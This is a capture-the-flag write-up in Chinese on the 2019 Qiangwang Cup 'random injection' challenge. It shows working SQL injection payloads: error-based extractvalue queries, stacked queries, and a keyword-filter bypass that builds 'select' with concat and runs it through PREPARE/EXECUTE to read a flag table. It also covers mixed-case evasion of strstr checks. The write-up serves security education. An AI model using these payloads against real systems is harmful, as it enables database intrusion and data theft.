2019强网杯-过滤select的注入

ctf

字数统计: 458阅读时长: 1 min

 2019/05/28   Share

这道题的题目就是随便注，说是取自某次真实渗透环境，确定了这道题是考察注入，经测试发现为单引号包裹的字符型注入，但是存在存在过滤，过滤的sql关键字如下

1	preg_match("/select\|update\|delete\|drop\|insert\|where\|\./i", $inject);

mark
这里过滤了select关键字，/i表示对大小写进行检查，所以大小写绕过无效，所以这里需要想别的办法，首先通过报错注入可以获取数据库的相关信息

通过报错注入获取当前数据库类型与版本：

http://117.78.39.172:32689/?inject=-1%27%20and%20extractvalue(1,concat(1,version()))--+

mark
.27-MariaDB-0ubuntu0.16.04.1

获取当前数据库名：
mark
supersqli

这里因为严格过滤了select关键字，导致不能继续注入，但是之后发现可以执行多语句，通过堆叠查询成功获取当前数据库（supersqli）下的表名

http://117.78.39.172:32689/?inject=-1%27;use%20supersqli;show%20tables;--+

mark
于是有了一个清晰的思路，可以通过执行多语句，将要执行的sql语句进行拼接，这样就可以将过滤的 sql关键字拆分绕过检测，通过动态执行sql语句发现1919810931114514表当中存在flag字段，payload如下

1	';use information_schema;set @sql=concat('s','elect column_name from columns wher','e table_name="1919810931114514"');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+

mark
之后就可以获取flag列的内容了

1	';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+

mark

（需要注意的一点是这一点使用了strstr对set和prepare关键字进行了检查，但是strstr检查不对大小写进行检查，所以这里可以通过大小写绕过，set和prepare关键字只要有一个是大写就可以绕过）
mark

原文作者：c1ay

CATALOG

